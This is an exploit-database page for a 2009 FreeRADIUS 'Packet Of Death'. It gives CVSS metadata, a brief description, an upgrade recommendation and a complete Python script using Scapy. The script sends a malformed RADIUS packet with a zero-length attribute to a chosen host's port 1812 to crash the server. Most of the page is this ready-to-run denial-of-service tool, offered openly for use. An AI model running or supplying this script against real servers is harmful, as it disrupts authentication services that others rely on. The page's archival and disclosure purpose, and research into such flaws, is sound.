header-logo
Suggest Exploit
vendor:
FreeRADIUS
by:
Matthew Gillespie
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: FreeRADIUS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FreeRadius Packet Of Death

This exploit is a denial of service attack against FreeRADIUS servers. It requires the use of the RadiusAttr library from Scapy. The exploit sends a malformed packet to the FreeRADIUS server, causing it to crash.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of FreeRADIUS.
Source

Exploit-DB raw data:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py <radiushost>\n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

# milw0rm.com [2009-09-11]

Navigation

Suggest Exploit

Services By CQR